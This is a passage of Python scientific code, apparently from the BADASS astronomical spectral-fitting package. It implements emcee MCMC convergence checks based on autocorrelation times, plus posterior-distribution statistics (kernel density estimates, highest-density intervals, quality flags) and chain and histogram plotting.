tol = (np.abs(tau-old_tau)/old_tau) * 100.0
autocorr_tols_all.append(tol) # append tol to storage array
# If convergence for mean autocorrelation time
if (auto_stop==True) & (conv_type == 'mean'):
par_conv = [] # converged parameter indices
par_not_conv = [] # non-converged parameter indices
for x in range(0,len(param_names),1):
if (round(tau[x],1)>1.0):# & (0.0<round(tol[x],1)<autocorr_tol):
par_conv.append(x) # Append index of parameter for which an autocorrelation time can be calculated; we use these to calculate the mean
else: par_not_conv.append(x)
# Calculate mean of parameters for which an autocorrelation time could be calculated
par_conv = np.array(par_conv) # Explicitly convert to array
par_not_conv = np.array(par_not_conv) # Explicitly convert to array
if (par_conv.size == 0) and (stop_iter == orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Not enough iterations for any autocorrelation times!')
elif ( (par_conv.size > 0) and (k+1)>(np.mean(tau[par_conv]) * ncor_times) and (np.mean(tol[par_conv])<autocorr_tol) and (stop_iter == max_iter) ):
if verbose:
print('\n ---------------------------------------------')
print(' | Converged at %d iterations. | ' % (k+1))
print(' | Performing %d iterations of sampling... | ' % min_samp )
print(' | Sampling will finish at %d iterations. | ' % ((k+1)+min_samp) )
print(' ---------------------------------------------')
burn_in = (k+1)
stop_iter = (k+1)+min_samp
conv_tau = tau
converged = True
elif ((par_conv.size == 0) or ( (k+1)<(np.mean(tau[par_conv]) * ncor_times)) or (np.mean(tol[par_conv])>autocorr_tol)) and (stop_iter < orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Jumped out of convergence! Resetting convergence criteria...')
# Reset convergence criteria
print('- Resetting burn_in = %d' % orig_burn_in)
print('- Resetting max_iter = %d' % orig_max_iter)
burn_in = orig_burn_in
stop_iter = orig_max_iter
converged = False
if (par_conv.size>0):
pnames_sorted = param_names[i_sort]
tau_sorted = tau[i_sort]
tol_sorted = tol[i_sort]
best_sorted = np.array(best)[i_sort]
if verbose:
print('{0:<30}{1:<40}{2:<30}'.format('\nIteration = %d' % (k+1),'%d x Mean Autocorr. Time = %0.2f' % (ncor_times,np.mean(tau[par_conv]) * ncor_times),'Mean Tolerance = %0.2f' % np.mean(tol[par_conv])))
print('--------------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<20}{2:<20}{3:<20}{4:<20}'.format('Parameter','Current Value','Autocorr. Time','Tolerance','Converged?'))
print('--------------------------------------------------------------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
if (((k+1)>tau_sorted[i]*ncor_times) and (tol_sorted[i]<autocorr_tol) and (tau_sorted[i]>1.0) ):
conv_bool = 'True'
else: conv_bool = 'False'
if (round(tau_sorted[i],1)>1.0):# & (tol[i]<autocorr_tol):
print('{0:<30}{1:<20.4f}{2:<20.4f}{3:<20.4f}{4:<20}'.format(pnames_sorted[i],best_sorted[i],tau_sorted[i],tol_sorted[i],conv_bool))
else:
print('{0:<30}{1:<20.4f}{2:<20}{3:<20}{4:<20}'.format(pnames_sorted[i],best_sorted[i],' -------- ',' -------- ',' -------- '))
print('--------------------------------------------------------------------------------------------------------')
# If convergence for median autocorrelation time
if (auto_stop==True) & (conv_type == 'median'):
par_conv = [] # converged parameter indices
par_not_conv = [] # non-converged parameter indices
for x in range(0,len(param_names),1):
if (round(tau[x],1)>1.0):# & (tol[x]<autocorr_tol):
par_conv.append(x) # Append index of parameter for which an autocorrelation time can be calculated; we use these to calculate the mean
else: par_not_conv.append(x)
# Calculate mean of parameters for which an autocorrelation time could be calculated
par_conv = np.array(par_conv) # Explicitly convert to array
par_not_conv = np.array(par_not_conv) # Explicitly convert to array
if (par_conv.size == 0) and (stop_iter == orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Not enough iterations for any autocorrelation times!')
elif ( (par_conv.size > 0) and (k+1)>(np.median(tau[par_conv]) * ncor_times) and (np.median(tol[par_conv])<autocorr_tol) and (stop_iter == max_iter) ):
if verbose:
print('\n ---------------------------------------------')
print(' | Converged at %d iterations. |' % (k+1))
print(' | Performing %d iterations of sampling... |' % min_samp )
print(' | Sampling will finish at %d iterations. |' % ((k+1)+min_samp) )
print(' ---------------------------------------------')
burn_in = (k+1)
stop_iter = (k+1)+min_samp
conv_tau = tau
converged = True
elif ((par_conv.size == 0) or ( (k+1)<(np.median(tau[par_conv]) * ncor_times)) or (np.median(tol[par_conv])>autocorr_tol)) and (stop_iter < orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Jumped out of convergence! Resetting convergence criteria...')
# Reset convergence criteria
print('- Resetting burn_in = %d' % orig_burn_in)
print('- Resetting max_iter = %d' % orig_max_iter)
burn_in = orig_burn_in
stop_iter = orig_max_iter
converged = False
if (par_conv.size>0):
pnames_sorted = param_names[i_sort]
tau_sorted = tau[i_sort]
tol_sorted = tol[i_sort]
best_sorted = np.array(best)[i_sort]
if verbose:
print('{0:<30}{1:<40}{2:<30}'.format('\nIteration = %d' % (k+1),'%d x Median Autocorr. Time = %0.2f' % (ncor_times,np.median(tau[par_conv]) * ncor_times),'Med. Tolerance = %0.2f' % np.median(tol[par_conv])))
print('--------------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<20}{2:<20}{3:<20}{4:<20}'.format('Parameter','Current Value','Autocorr. Time','Tolerance','Converged?'))
print('--------------------------------------------------------------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
if (((k+1)>tau_sorted[i]*ncor_times) and (tol_sorted[i]<autocorr_tol) and (tau_sorted[i]>1.0)):
conv_bool = 'True'
else: conv_bool = 'False'
if (round(tau_sorted[i],1)>1.0):# & (tol[i]<autocorr_tol):
print('{0:<30}{1:<20.4f}{2:<20.4f}{3:<20.4f}{4:<20}'.format(pnames_sorted[i],best_sorted[i],tau_sorted[i],tol_sorted[i],conv_bool))
else:
print('{0:<30}{1:<20.4f}{2:<20}{3:<20}{4:<20}'.format(pnames_sorted[i],best_sorted[i],' -------- ',' -------- ',' -------- '))
print('--------------------------------------------------------------------------------------------------------')
# If convergence for ALL autocorrelation times
if (auto_stop==True) & (conv_type == 'all'):
if ( all( (x==1.0) for x in tau) ) and (stop_iter == orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Not enough iterations for any autocorrelation times!')
elif all( ((k+1)>(x * ncor_times)) for x in tau) and all( (x>1.0) for x in tau) and all(y<autocorr_tol for y in tol) and (stop_iter == max_iter):
if verbose:
print('\n ---------------------------------------------')
print(' | Converged at %d iterations. | ' % (k+1))
print(' | Performing %d iterations of sampling... | ' % min_samp )
print(' | Sampling will finish at %d iterations. | ' % ((k+1)+min_samp) )
print(' ---------------------------------------------')
burn_in = (k+1)
stop_iter = (k+1)+min_samp
conv_tau = tau
converged = True
elif (any( ((k+1)<(x * ncor_times)) for x in tau) or any( (x==1.0) for x in tau) or any(y>autocorr_tol for y in tol)) and (stop_iter < orig_max_iter):
if verbose:
print('\n Iteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Jumped out of convergence! Resetting convergence criteria...')
# Reset convergence criteria
print('- Resetting burn_in = %d' % orig_burn_in)
print('- Resetting max_iter = %d' % orig_max_iter)
burn_in = orig_burn_in
stop_iter = orig_max_iter
converged = False
if 1:
pnames_sorted = param_names[i_sort]
tau_sorted = tau[i_sort]
tol_sorted = tol[i_sort]
best_sorted = np.array(best)[i_sort]
if verbose:
print('{0:<30}'.format('\nIteration = %d' % (k+1)))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<20}{2:<20}{3:<25}{4:<20}{5:<20}'.format('Parameter','Current Value','Autocorr. Time','Target Autocorr. Time','Tolerance','Converged?'))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
if (((k+1)>tau_sorted[i]*ncor_times) and (tol_sorted[i]<autocorr_tol) and (tau_sorted[i]>1.0) ):
conv_bool = 'True'
else: conv_bool = 'False'
if (round(tau_sorted[i],1)>1.0):# & (tol[i]<autocorr_tol):
print('{0:<30}{1:<20.4f}{2:<20.4f}{3:<25.4f}{4:<20.4f}{5:<20}'.format(pnames_sorted[i],best_sorted[i],tau_sorted[i],tau_sorted[i]*ncor_times,tol_sorted[i],str(conv_bool)))
else:
print('{0:<30}{1:<20.4f}{2:<20}{3:<25}{4:<20}{5:<20}'.format(pnames_sorted[i],best_sorted[i],' -------- ',' -------- ',' -------- ',' -------- '))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
# If convergence for a specific set of parameters
if (auto_stop==True) & (isinstance(conv_type,tuple)==True):
# Get indices of parameters for which we want to converge; these will be the only ones we care about
par_ind = np.array([i for i, item in enumerate(param_names) if item in set(conv_type)])
# Get list of parameters, autocorrelation times, and tolerances for the ones we care about
param_interest = param_names[par_ind]
tau_interest = tau[par_ind]
tol_interest = tol[par_ind]
best_interest = np.array(best)[par_ind]
# New sort for selected parameters
i_sort = np.argsort(param_interest) # this array gives the ordered indices of parameter names (alphabetical)
if ( all( (x==1.0) for x in tau_interest) ) and (stop_iter == orig_max_iter):
if verbose:
print('\nIteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Not enough iterations for any autocorrelation times!')
elif all( ((k+1)>(x * ncor_times)) for x in tau_interest) and all( (x>1.0) for x in tau_interest) and all(y<autocorr_tol for y in tol_interest) and (stop_iter == max_iter):
if verbose:
print('\n ---------------------------------------------')
print(' | Converged at %d iterations. | ' % (k+1))
print(' | Performing %d iterations of sampling... | ' % min_samp )
print(' | Sampling will finish at %d iterations. | ' % ((k+1)+min_samp) )
print(' ---------------------------------------------')
burn_in = (k+1)
stop_iter = (k+1)+min_samp
conv_tau = tau
converged = True
elif (any( ((k+1)<(x * ncor_times)) for x in tau_interest) or any( (x==1.0) for x in tau_interest) or any(y>autocorr_tol for y in tol_interest)) and (stop_iter < orig_max_iter):
if verbose:
print('\n Iteration = %d' % (k+1))
print('-------------------------------------------------------------------------------')
print('- Jumped out of convergence! Resetting convergence criteria...')
# Reset convergence criteria
print('- Resetting burn_in = %d' % orig_burn_in)
print('- Resetting max_iter = %d' % orig_max_iter)
burn_in = orig_burn_in
stop_iter = orig_max_iter
converged = False
if 1:
pnames_sorted = param_interest[i_sort]
tau_sorted = tau_interest[i_sort]
tol_sorted = tol_interest[i_sort]
best_sorted = np.array(best_interest)[i_sort]
if verbose:
print('{0:<30}'.format('\nIteration = %d' % (k+1)))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
print('{0:<30}{1:<20}{2:<20}{3:<25}{4:<20}{5:<20}'.format('Parameter','Current Value','Autocorr. Time','Target Autocorr. Time','Tolerance','Converged?'))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
if (((k+1)>tau_sorted[i]*ncor_times) and (tol_sorted[i]<autocorr_tol) and (tau_sorted[i]>1.0) ):
conv_bool = 'True'
else: conv_bool = 'False'
if (round(tau_sorted[i],1)>1.0):# & (tol[i]<autocorr_tol):
print('{0:<30}{1:<20.4f}{2:<20.4f}{3:<25.4f}{4:<20.4f}{5:<20}'.format(pnames_sorted[i],best_sorted[i],tau_sorted[i],tau_sorted[i]*ncor_times,tol_sorted[i],str(conv_bool)))
else:
print('{0:<30}{1:<20.4f}{2:<20}{3:<25}{4:<20}{5:<20}'.format(pnames_sorted[i],best_sorted[i],' -------- ',' -------- ',' -------- ',' -------- '))
print('--------------------------------------------------------------------------------------------------------------------------------------------')
# Stop
if ((k+1) == stop_iter):
break
old_tau = tau
# If auto_stop=False, simply print out the parameters and their best values at that iteration
if ((k+1) % write_iter == 0) and ((k+1)>=min_iter) and ((k+1)>=write_thresh) and (auto_stop==False):
pnames_sorted = param_names[i_sort]
best_sorted = np.array(best)[i_sort]
if verbose:
print('{0:<30}'.format('\nIteration = %d' % (k+1)))
print('------------------------------------------------')
print('{0:<30}{1:<20}'.format('Parameter','Current Value'))
print('------------------------------------------------')
for i in range(0,len(pnames_sorted),1):
print('{0:<30}{1:<20.4f}'.format(pnames_sorted[i],best_sorted[i]))
print('------------------------------------------------')
elap_time = (time.time() - start_time)
run_time = time_convert(elap_time)
if verbose:
print("\n emcee Runtime = %s. \n" % (run_time))
# Write to log file
if (auto_stop==True):
# Write autocorrelation chain to log
# np.save(run_dir+'/log/autocorr_times_all',autocorr_times_all)
# np.save(run_dir+'/log/autocorr_tols_all',autocorr_tols_all)
# Create a dictionary with parameter names as keys, and contains
# the autocorrelation times and tolerances for each parameter
autocorr_times_all = np.stack(autocorr_times_all,axis=1)
autocorr_tols_all = np.stack(autocorr_tols_all,axis=1)
autocorr_dict = {}
for k in range(0,len(param_names),1):
if (np.shape(autocorr_times_all)[0] > 1):
autocorr_dict[param_names[k]] = {'tau':autocorr_times_all[k],
'tol':autocorr_tols_all[k]}
np.save(run_dir.joinpath('log', 'autocorr_dict.npy'),autocorr_dict)
if (converged == True):
write_log((burn_in,stop_iter,param_names,conv_tau,autocorr_tol,tol,ncor_times),'autocorr_results',run_dir)
elif (converged == False):
unconv_tol = (np.abs((old_tau) - (tau)) / (tau))
write_log((burn_in,stop_iter,param_names,tau,autocorr_tol,unconv_tol,ncor_times),'autocorr_results',run_dir)
write_log(run_time,'emcee_time',run_dir)
# Remove excess zeros from sampler chain if emcee converged on a solution
# in fewer iterations than max_iter
# Remove zeros from all chains
a = [] # the zero-trimmed sampler.chain
for p in range(0,np.shape(sampler.chain)[2],1):
c = sampler.chain[:,:,p]
c_trimmed = [np.delete(c[i,:],np.argwhere(c[i,:]==0)) for i in range(np.shape(c)[0])] # delete any occurence of zero
a.append(c_trimmed)
a = np.swapaxes(a,1,0)
a = np.swapaxes(a,2,1)
# Extract metadata blobs
blobs = sampler.get_blobs()
flux_blob = blobs["fluxes"]
eqwidth_blob = blobs["eqwidths"]
cont_flux_blob = blobs["cont_fluxes"]
int_vel_disp_blob = blobs["int_vel_disp"]
log_like_blob = blobs["log_like"]
return a, burn_in, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob, log_like_blob
##################################################################################
# Autocorrelation analysis
##################################################################################
def autocorr_convergence(emcee_chain,param_names,plot=False):
"""
My own recipe for convergence.
"""
# Remove zeros from all chains
sampler_chain = []
for p in range(0,np.shape(emcee_chain)[2],1):
c = emcee_chain[:,:,p]
c_trimmed = [np.delete(c[i,:],np.argwhere(c[i,:]==0)) for i in range(np.shape(c)[0])] # delete any occurence of zero
sampler_chain.append(c_trimmed)
sampler_chain = np.swapaxes(sampler_chain,1,0)
sampler_chain = np.swapaxes(sampler_chain,2,1)
nwalker = np.shape(sampler_chain)[0] # Number of walkers
niter = np.shape(sampler_chain)[1] # Number of iterations
npar = np.shape(sampler_chain)[2] # Number of parameters
def autocorr_func(c_x):
""""""
acf = []
for p in range(0,np.shape(c_x)[1],1):
x = c_x[:,p]
# Subtract mean value
rms_x = np.median(x)
x = x - rms_x
cc = np.correlate(x,x,mode='full')
cc = cc[cc.size // 2:]
cc = cc/np.max(cc)
acf.append(cc)
# Flip the array
acf = np.swapaxes(acf,1,0)
return acf
def auto_window(taus, c):
"""
(Adapted from https://github.com/dfm/emcee/blob/master/emcee/autocorr.py)
"""
m = np.arange(len(taus)) < c * taus
if np.any(m):
return np.argmin(m)
return len(taus) - 1
def integrated_time(acf, c=5, tol=0):
"""Estimate the integrated autocorrelation time of a time series.
This estimate uses the iterative procedure described on page 16 of
`Sokal's notes <http://www.stat.unc.edu/faculty/cji/Sokal.pdf>`_ to
determine a reasonable window size.
Args:
acf: The time series. If multidimensional, set the time axis using the
``axis`` keyword argument and the function will be computed for
every other axis.
c (Optional[float]): The step size for the window search. (default:
``5``)
tol (Optional[float]): The minimum number of autocorrelation times
needed to trust the estimate. (default: ``0``)
Returns:
float or array: An estimate of the integrated autocorrelation time of
the time series ``x`` computed along the axis ``axis``.
(Adapted from https://github.com/dfm/emcee/blob/master/emcee/autocorr.py)
"""
tau_est = np.empty(np.shape(acf)[1])
windows = np.empty(np.shape(acf)[1], dtype=int)
# Loop over parameters
for p in range(0,np.shape(acf)[1],1):
taus = 2.0*np.cumsum(acf[:,p])-1.0
windows[p] = auto_window(taus, c)
tau_est[p] = taus[windows[p]]
return tau_est
c_x = np.mean(sampler_chain[:,:,:],axis=0)
acf = autocorr_func(c_x)
tau_est = integrated_time(acf)
if (plot==True):
fig = plt.figure(figsize=(14,4))
ax1 = fig.add_subplot(2,1,1)
ax2 = fig.add_subplot(2,1,2)
for c in range(0,np.shape(c_x)[1],1):
cn = (c_x[:,c])/(np.median(c_x[:,c]))
ax1.plot(cn,alpha=1.,linewidth=0.5)
ax1.axhline(1.0,alpha=1.,linewidth=0.5,color='black',linestyle='--')
ax1.set_xlim(0,np.shape(c_x)[0])
ax2.plot(range(np.shape(acf)[0]),acf,alpha=1.,linewidth=0.5,label='ACF')
ax2.axhline(0.0,alpha=1.,linewidth=0.5)
ax2.set_xlim(np.min(range(np.shape(acf)[0])),np.max(range(np.shape(acf)[0])))
plt.tight_layout()
return tau_est
##################################################################################
# Plotting Routines
##################################################################################
def gauss_kde(xs,data,h):
"""
Gaussian kernel density estimation.
"""
def gauss_kernel(x):
return (1./np.sqrt(2.*np.pi)) * np.exp(-x**2/2)
kde = np.sum((1./h) * gauss_kernel((xs.reshape(len(xs),1)-data)/h), axis=1)
kde = kde/simps(kde,xs)# normalize
return kde
def kde_bandwidth(data):
"""
Silverman bandwidth estimation for kernel density estimation.
"""
return (4./(3.*len(data)))**(1./5.) * np.std(data)
def compute_HDI(posterior_samples, credible_mass):
"""
Computes highest density interval from a sample of representative values,
estimated as the shortest credible interval.
Takes Arguments posterior_samples (samples from posterior) and credible mass (usually 0.95):
https://www.sciencedirect.com/topics/mathematics/highest-density-interval
BADASS uses the 0.68 interval.
"""
sorted_points = sorted(posterior_samples)
ciIdxInc = np.ceil(credible_mass * len(sorted_points)).astype('int')
nCIs = len(sorted_points) - ciIdxInc
# If the requested credible mass is equal to the number of posterior samples than the
# CI is simply the extent of the data. This is typical of the 99.7% CI case for N<1000
if nCIs==0:
HDImin = np.min(posterior_samples)
HDImax = np.max(posterior_samples)
else:
ciWidth = [0]*nCIs
for i in range(0, nCIs):
ciWidth[i] = sorted_points[i + ciIdxInc] - sorted_points[i]
HDImin = sorted_points[ciWidth.index(min(ciWidth))]
HDImax = sorted_points[ciWidth.index(min(ciWidth))+ciIdxInc]
return(HDImin, HDImax)
def posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir
):
"""
Plot posterior distributions and chains from MCMC.
"""
# Initialize figures and axes
# Make an updating plot of the chain
fig = plt.figure(figsize=(10,8))
gs = gridspec.GridSpec(2, 2)
gs.update(wspace=0.35, hspace=0.35) # set the spacing between axes.
ax1 = plt.subplot(gs[0,0])
ax2 = plt.subplot(gs[0,1])
ax3 = plt.subplot(gs[1,0:2])
# Histogram; 'Doane' binning produces the best results from tests.
n, bins, patches = ax1.hist(flat, bins='doane', histtype="bar" , density=True, facecolor="#4200a6", alpha=1,zorder=10)
# Plot 1: Histogram plots
ax1.axvline(post_max ,linewidth=0.5,linestyle="-",color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'$p(\theta|x)_{\rm{max}}$')
#
ax1.axvline(post_max-low_68,linewidth=0.5,linestyle="--" ,color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'68% conf.')
ax1.axvline(post_max+upp_68,linewidth=0.5,linestyle="--" ,color='xkcd:bright aqua',alpha=1.00,zorder=20)
#
ax1.axvline(post_max-low_95,linewidth=0.5,linestyle=":" ,color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'95% conf.')
ax1.axvline(post_max+upp_95,linewidth=0.5,linestyle=":" ,color='xkcd:bright aqua',alpha=1.00,zorder=20)
#
# ax1.axvline(post_mean,linewidth=0.5,linestyle="--",color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'Mean')
# ax1.axvline(post_mean-post_std,linewidth=0.5,linestyle=":" ,color='xkcd:bright aqua',alpha=1.00,zorder=20,label=r'Std. Dev.')
# ax1.axvline(post_mean+post_std,linewidth=0.5,linestyle=":" ,color='xkcd:bright aqua',alpha=1.00,zorder=20)
#
# ax1.axvline(post_med,linewidth=0.5,linestyle="--",color='xkcd:bright yellow',alpha=1.00,zorder=20,label=r'Median')
# ax1.axvline(post_med-post_mad,linewidth=0.5,linestyle=":" ,color='xkcd:bright yellow',alpha=1.00,zorder=20,label=r'Med. Abs. Dev.')
# ax1.axvline(post_med+post_mad,linewidth=0.5,linestyle=":" ,color='xkcd:bright yellow',alpha=1.00,zorder=20)
#
ax1.plot(xs,kde ,linewidth=0.5,linestyle="-" ,color="xkcd:bright pink",alpha=1.00,zorder=15,label="KDE")
ax1.plot(xs,kde ,linewidth=3.0,linestyle="-" ,color="xkcd:bright pink",alpha=0.50,zorder=15)
ax1.plot(xs,kde ,linewidth=6.0,linestyle="-" ,color="xkcd:bright pink",alpha=0.20,zorder=15)
ax1.grid(b=True,which="major",axis="both",alpha=0.15,color="xkcd:bright pink",linewidth=0.5,zorder=0)
# ax1.plot(xvec,yvec,color='white')
ax1.set_xlabel(r'%s' % key,fontsize=12)
ax1.set_ylabel(r'$p$(%s)' % key,fontsize=12)
ax1.legend(loc="best",fontsize=6)
# Plot 2: best fit values
values = [post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad]
labels = [r"$p(\theta|x)_{\rm{max}}$",
r"$\rm{CI\;68\%\;low}$",r"$\rm{CI\;68\%\;upp}$",
r"$\rm{CI\;95\%\;low}$",r"$\rm{CI\;95\%\;upp}$",
r"$\rm{Mean}$",r"$\rm{Std.\;Dev.}$",
r"$\rm{Median}$",r"$\rm{Med. Abs. Dev.}$"]
start, step = 1, 0.12
vspace = np.linspace(start,1-len(labels)*step,len(labels),endpoint=False)
# Plot 2: best fit values
for i in range(len(labels)):
ax2.annotate('{0:>30}{1:<2}{2:<30.3f}'.format(labels[i],r"$\qquad=\qquad$",values[i]),
xy=(0.5, vspace[i]), xycoords='axes fraction',
xytext=(0.95, vspace[i]), textcoords='axes fraction',
horizontalalignment='right', verticalalignment='top',
fontsize=10)
ax2.axis('off')
# Plot 3: Chain plot
for w in range(0,np.shape(chain)[0],1):
ax3.plot(range(np.shape(chain)[1]),chain[w,:],color='white',linewidth=0.5,alpha=0.5,zorder=0)
# Calculate median and median absolute deviation of walkers at each iteration; we have depreciated
# the average and standard deviation because they do not behave well for outlier walkers, which
# also don't agree with histograms.
c_med = np.median(chain,axis=0)
c_madstd = mad_std(chain)
ax3.plot(range(np.shape(chain)[1]),c_med,color='xkcd:bright pink',alpha=1.,linewidth=2.0,label='Median',zorder=10)
ax3.fill_between(range(np.shape(chain)[1]),c_med+c_madstd,c_med-c_madstd,color='#4200a6',alpha=0.5,linewidth=1.5,label='Median Absolute Dev.',zorder=5)
ax3.axvline(burn_in,linestyle='--',linewidth=0.5,color='xkcd:bright aqua',label='burn-in = %d' % burn_in,zorder=20)
ax3.grid(b=True,which="major",axis="both",alpha=0.15,color="xkcd:bright pink",linewidth=0.5,zorder=0)
ax3.set_xlim(0,np.shape(chain)[1])
ax3.set_xlabel('$N_\mathrm{iter}$',fontsize=12)
ax3.set_ylabel(r'%s' % key,fontsize=12)
ax3.legend(loc='upper left')
# Save the figure
histo_dir = run_dir.joinpath('histogram_plots')
histo_dir.mkdir(parents=True, exist_ok=True)
plt.savefig(histo_dir.joinpath('%s_MCMC.png' % (key)), bbox_inches="tight",dpi=300,fmt='png')
# Close plot window
fig.clear()
plt.close()
return
def param_plots(param_dict,burn_in,run_dir,plot_param_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
free parameters from MCMC sample chains.
"""
#
if verbose:
print("\n Generating model parameter distributions...\n")
for key in param_dict:
#
if verbose:
print(' %s' % key)
chain = param_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# Flatten the chains
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= (param_dict[key]['plim'][0]) ):
flag+=1
if ( (post_max+1.5*upp_68) >= (param_dict[key]['plim'][1]) ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
param_dict[key]['par_best'] = post_max # maximum of posterior distribution
param_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
param_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
param_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
param_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
param_dict[key]['mean'] = post_mean # mean of posterior distribution
param_dict[key]['std_dev'] = post_std # standard deviation
param_dict[key]['median'] = post_med # median of posterior distribution
param_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
param_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
param_dict[key]['flag'] = flag
if (plot_param_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir
)
else:
param_dict[key]['par_best'] = np.nan # maximum of posterior distribution
param_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
param_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
param_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
param_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
param_dict[key]['mean'] = np.nan # mean of posterior distribution
param_dict[key]['std_dev'] = np.nan # standard deviation
param_dict[key]['median'] = np.nan # median of posterior distribution
param_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
param_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
param_dict[key]['flag'] = 1
return param_dict
def log_like_plot(ll_blob, burn_in, nwalkers, run_dir, plot_param_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
component fluxes from MCMC sample chains.
"""
ll = ll_blob.T
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(ll)[1]):
burn_in = int(0.5*np.shape(ll)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
flat = ll[:,burn_in:]
flat = flat.flat
# Old confidence interval stuff; replaced by np.quantile
# p = np.percentile(flat, [16, 50, 84])
# pdfmax = p[1]
# low1 = p[1]-p[0]
# upp1 = p[2]-p[1]
# Subsample the data into a manageable size for the kde and HDI
if len(flat[np.isfinite(flat)]) > 0:
subsampled = np.random.choice(flat[np.isfinite(flat)],size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
